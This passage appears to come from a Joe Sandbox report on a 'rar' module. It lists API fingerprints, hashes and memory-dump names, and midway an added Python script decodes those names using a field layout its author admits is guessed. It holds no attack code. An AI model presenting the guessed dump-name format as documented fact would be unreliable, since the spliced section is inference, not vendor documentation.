                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3659116390-0
                                                                                                                                                                                                                                • Opcode ID: 96f561c31132e0ea19a5ef4c1750fe83e0f57ac60b3e80aac86a7179c63ec212
                                                                                                                                                                                                                                • Instruction ID: 07e1e8a92630b5b639499a4804b862e5f36df75a3042dbeb507fd9f184f704a2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 96f561c31132e0ea19a5ef4c1750fe83e0f57ac60b3e80aac86a7179c63ec212
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC51C072E18A918AE711CF25D4443AD7BB0BB49B98F048175DE6E97AD8EF38D14AC700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
• Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: CharHandleWrite$ByteConsoleFileMultiWide
• String ID:
• API String ID: 643171463-0
APIs
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
• Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmp
Similarity
• API ID: AddressProc
• String ID:
• API String ID: 190572456-0
APIs
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
APIs
Strings
Similarity
• API ID: wcschr$BeepMessage
• String ID: ($[%c]%ls
• API String ID: 1408639281-228076469
APIs
Strings
Similarity
• API ID: swprintf
• String ID: %c%c%c%c%c%c%c$%c%c%c%c%c%c%c%c%c
• API String ID: 233258989-622958660
APIs
Strings
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
• Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmp
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: wcschr
                                                                                                                                                                                                                                • String ID: MCAOmcao$MCAOmcao
                                                                                                                                                                                                                                • API String ID: 1497570035-1725859250
                                                                                                                                                                                                                                • Opcode ID: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
                                                                                                                                                                                                                                • Instruction ID: c3f9074d35b0943043254fdfa2e930e8ab9d6f8d09d2ab694b887d043cef7471
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C41E512D0C78380F7609F24914257E5261AF16B84F9854B2EABDCA3D5FE3FE85B8721
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 00007FF6FAA4359E
                                                                                                                                                                                                                                • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6FAA435E6
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA430C8: GetFileAttributesW.KERNELBASE(00000800,00007FF6FAA4305D,?,?,?,?,?,?,?,?,00007FF6FAA54126,?,?,?,?,00000800), ref: 00007FF6FAA430F0
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA430C8: GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF6FAA54126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF6FAA43119
                                                                                                                                                                                                                                • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6FAA43651
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AttributesFileswprintf$CurrentProcess
                                                                                                                                                                                                                                • String ID: %u.%03u
                                                                                                                                                                                                                                • API String ID: 2814246642-1114938957
                                                                                                                                                                                                                                • Opcode ID: 84c97cd936c0b2bb546c7914bc35e6a0bad55efb9bf4e2a2824d38ff43805cc4
                                                                                                                                                                                                                                • Instruction ID: 5f6953ee039337060ac2ee8760a04c9cfb2061de38691e97990f8513429f5ca7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 84c97cd936c0b2bb546c7914bc35e6a0bad55efb9bf4e2a2824d38ff43805cc4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A312621618A8182E7149B29E5112BAA660FB887B4F501335ED7E87BF5FF3DD50B8700
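The eleven `.sdmp` names under "Memory Dump Source" describe every dumped region of the module the report's snapshot file labels `rar` (process 0x6D, stage 2). Reading them by hand is error-prone, so the following Python is added here as a worked example; it is not part of the Joe Sandbox report or of the Joe Sandbox tooling. Its field layout for the dump names (`pid.stage.dump-id.base.protection.type.flags.module-id.sdmp`) is an assumption inferred from the entries on this page, not from documentation. The protection field is read as the documented Win32 `PAGE_*` constant, which agrees with what the page shows: `0x02` (`PAGE_READONLY`) at the image base where the PE header lives, `0x20` (`PAGE_EXECUTE_READ`) at base+0x1000 where `.text` lives, and a pid/stage/base that reproduce the `hcaresult_109_2_7ff6faa20000` prefix of the snapshot file.

```python
"""Added example: decode Joe Sandbox *.sdmp names into a region map.

ASSUMED field layout (inferred from this page, not documented):
  <pid>.<stage>.<dump id>.<base>.<protection>.<type>.<flags>.<module id>.sdmp
<protection> is read as a Win32 PAGE_* constant (winnt.h).
"""
from dataclasses import dataclass
import re

# Documented Win32 memory protection constants.
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE", 0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
_EXECUTE_MASK = 0xF0  # any PAGE_EXECUTE* value has one of these bits set

_HEX8 = r"[0-9A-Fa-f]{8}"
_NAME_RE = re.compile(
    rf"^(?P<pid>{_HEX8})\.(?P<stage>{_HEX8})\.(?P<dump_id>\d+)\."
    rf"(?P<base>[0-9A-Fa-f]{{16}})\.(?P<protect>{_HEX8})\.(?P<kind>{_HEX8})\."
    rf"(?P<flags>{_HEX8})\.(?P<module>{_HEX8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    pid: int
    stage: int
    dump_id: int
    base: int
    protect: int
    kind: int
    flags: int
    module_id: int

    @property
    def protection_name(self) -> str:
        return PAGE_PROTECTION.get(self.protect, f"UNKNOWN(0x{self.protect:02x})")

    @property
    def executable(self) -> bool:
        return bool(self.protect & _EXECUTE_MASK)


def parse_dump_name(name: str) -> DumpRegion:
    """Split one *.sdmp name into fields; ValueError for anything else."""
    m = _NAME_RE.match(name.strip())
    if m is None:
        raise ValueError(f"not a Joe Sandbox dump name: {name!r}")
    return DumpRegion(
        pid=int(m["pid"], 16), stage=int(m["stage"], 16),
        dump_id=int(m["dump_id"]), base=int(m["base"], 16),
        protect=int(m["protect"], 16), kind=int(m["kind"], 16),
        flags=int(m["flags"], 16), module_id=int(m["module"], 16),
    )


def module_layout(names):
    """Source dump plus its 'Associated' dumps, sorted by address.
    Refuses input mixing processes, stages or modules: a region map only
    makes sense for one image in one process snapshot."""
    regions = sorted((parse_dump_name(n) for n in names), key=lambda r: r.base)
    if not regions:
        raise ValueError("no dump names given")
    if len({(r.pid, r.stage, r.module_id) for r in regions}) != 1:
        raise ValueError("dumps span more than one process/stage/module")
    return regions


def code_regions(names):
    """The dumps worth loading into a disassembler: those mapped executable."""
    return [r for r in module_layout(names) if r.executable]


def snapshot_prefix(names):
    """Rebuild the hcaresult_<pid>_<stage>_<image base> prefix the report uses
    for its IDA snapshot (observed pattern: decimal pid and stage, hex base)."""
    first = module_layout(names)[0]
    return f"hcaresult_{first.pid}_{first.stage}_{first.base:x}"


# The dump names listed for this function on the page (copied from the report).
RAR_DUMPS = [
    "0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp",
    "0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmp",
    "0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp",
    "0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmp",
    "0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmp",
    "0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmp",
    "0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmp",
    "0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmp",
    "0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmp",
    "0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmp",
    "0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmp",
]

if __name__ == "__main__":
    for r in module_layout(RAR_DUMPS):
        print(f"{r.base:016X}  {r.protection_name:<24} {'code' if r.executable else 'data'}")
    print("IDA snapshot prefix:", snapshot_prefix(RAR_DUMPS))
```

Run stand-alone it prints the module as a sorted table: the read-only header page at 0x7FF6FAA20000, the single executable region at 0x7FF6FAA21000 (the "Source File" dump the function fingerprints above were taken from), then the read-only, read-write and write-copy data regions. `module_layout` deliberately refuses a list that mixes processes or modules, because an analyst pasting "Associated" lines from two different functions would otherwise get a silently merged map.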
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                                                                                                                                • String ID: U
                                                                                                                                                                                                                                • API String ID: 2456169464-4171548499
                                                                                                                                                                                                                                • Opcode ID: 5dbcbed523f5bc97d8a97ee5e840f7eee38a7f1acec6aeee37cbb534f8f7503d
                                                                                                                                                                                                                                • Instruction ID: e949166097ce85f6f3625c10abe30d24e0d75db045748eab753bdacc2f48ab97
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5dbcbed523f5bc97d8a97ee5e840f7eee38a7f1acec6aeee37cbb534f8f7503d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0941BF32B18A8186EB609F25E8443BAB7A1FB88784F804031EE5D87788EF3CD446C700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                • API String ID: 2280078643-1018135373
                                                                                                                                                                                                                                • Opcode ID: 17bbef4e125ef7202bf11184ec0650b854660f7e5235f7bad60fbeeb41854260
                                                                                                                                                                                                                                • Instruction ID: bf9fb94a7f119e7668ed1cd6866a14bcbfbe9051fb36ef378bb8bb2ec303cec5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 17bbef4e125ef7202bf11184ec0650b854660f7e5235f7bad60fbeeb41854260
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F21297A60864182E770DB15E04026F7761FB88BA5F001275DEAD83BD9DF3DE88ACB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: wcschr$swprintf
• String ID: %c:\
• API String ID: 1303626722-3142399695
• Opcode ID: 8ec5db83852f4a6a2a7f14eb2e9108a79b2b390c2c776aa97bec8582bcc41707
• Instruction ID: 323aa63c1bae22aac1b507bca4774c1c88b43f7225c99881d41083371e9585c9
• Opcode Fuzzy Hash: 8ec5db83852f4a6a2a7f14eb2e9108a79b2b390c2c776aa97bec8582bcc41707
• Instruction Fuzzy Hash: 4D11AE22A1878286EF206F15D5010AD6371EF55BA0B188171CFBE837E6FF3CE46A8204
APIs
Strings
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: Create$CriticalEventInitializeSectionSemaphore
• String ID: Thread pool initialization failed.
• API String ID: 3340455307-2182114853
• Opcode ID: d15256d0e5626b759ea638b3cf01690b973b86e734aede79ee3cd8415fd62731
• Instruction ID: 9b1f8a99e058f657920d95d4cc63e8022425c69d74d8434ce8f2d90c1a0e3183
• Opcode Fuzzy Hash: d15256d0e5626b759ea638b3cf01690b973b86e734aede79ee3cd8415fd62731
• Instruction Fuzzy Hash: E211E632F1574182FB508F25E4453AA32A2EBD8B98F1C8035CA5D876D9EF3ED45B8780
APIs
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: Exception$Throwstd::bad_alloc::bad_alloc$FileHeaderRaise
• String ID:
• API String ID: 904936192-0
• Opcode ID: bf3ffebf7957390d4581f483ab4461efbf63170567da09303d3b90ab416dc0f1
• Instruction ID: 30d68d39f1552036ea92de0c5a8d2bfb825db467f0e1b7073e99b3dcca2f8f3b
• Opcode Fuzzy Hash: bf3ffebf7957390d4581f483ab4461efbf63170567da09303d3b90ab416dc0f1
• Instruction Fuzzy Hash: D251D172A19A8182EB50CF25D4503AD73A1FBC4B94F048235DE6E877D8EF79D51AC300
APIs
• CreateFileW.KERNEL32(?,00000000,00000004,00000000,?,?,?,?,?,00007FF6FAA3F6FC,00000000,?,?,?,?,00007FF6FAA4097D), ref: 00007FF6FAA438CD
• CreateFileW.KERNEL32(?,?,?,?,?,00007FF6FAA3F6FC,00000000,?,?,?,?,00007FF6FAA4097D,?,?,00000000), ref: 00007FF6FAA4391F
• SetFileTime.KERNEL32(?,?,?,?,?,00007FF6FAA3F6FC,00000000,?,?,?,?,00007FF6FAA4097D,?,?,00000000), ref: 00007FF6FAA4399B
• CloseHandle.KERNEL32(?,?,?,?,?,00007FF6FAA3F6FC,00000000,?,?,?,?,00007FF6FAA4097D,?,?,00000000), ref: 00007FF6FAA439A6
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: File$Create$CloseHandleTime
• String ID:
• API String ID: 2287278272-0
• Opcode ID: 6b21d4b4015e45ce14e3c1bb02d2562928349115458abc9ea3e67fc953cea0f1
• Instruction ID: 8464d4586d3309736422a9d415b354ba1152a818175d9268e44ed05b826cdf87
• Opcode Fuzzy Hash: 6b21d4b4015e45ce14e3c1bb02d2562928349115458abc9ea3e67fc953cea0f1
• Instruction Fuzzy Hash: 2041D422A0CA4142FB508B15A41177AA7A0BF867A4F104275FEAD877E9FF7DD40F8B00
APIs
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 932687459-0
APIs
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
• Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
• String ID:
• API String ID: 4141327611-0
APIs
• CreateFileW.KERNEL32(?,00007FF6FAA286CB,?,?,?,00007FF6FAA2A5CB,?,?,00000000,?,?,00000040,?,?,00007FF6FAA22DF9), ref: 00007FF6FAA3D09D
• CreateFileW.KERNEL32(?,00007FF6FAA286CB,?,?,?,00007FF6FAA2A5CB,?,?,00000000,?,?,00000040,?,?,00007FF6FAA22DF9), ref: 00007FF6FAA3D0E5
• CreateFileW.KERNEL32(?,00007FF6FAA286CB,?,?,?,00007FF6FAA2A5CB,?,?,00000000,?,?,00000040,?,?,00007FF6FAA22DF9), ref: 00007FF6FAA3D114
• CreateFileW.KERNEL32(?,00007FF6FAA286CB,?,?,?,00007FF6FAA2A5CB,?,?,00000000,?,?,00000040,?,?,00007FF6FAA22DF9), ref: 00007FF6FAA3D15C
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
APIs
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: CurrentPriorityThread$ClassProcess
• String ID:
• API String ID: 1171435874-0
APIs
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: ErrorLast$abort
• String ID:
• API String ID: 1447195878-0
APIs
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
• Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmp
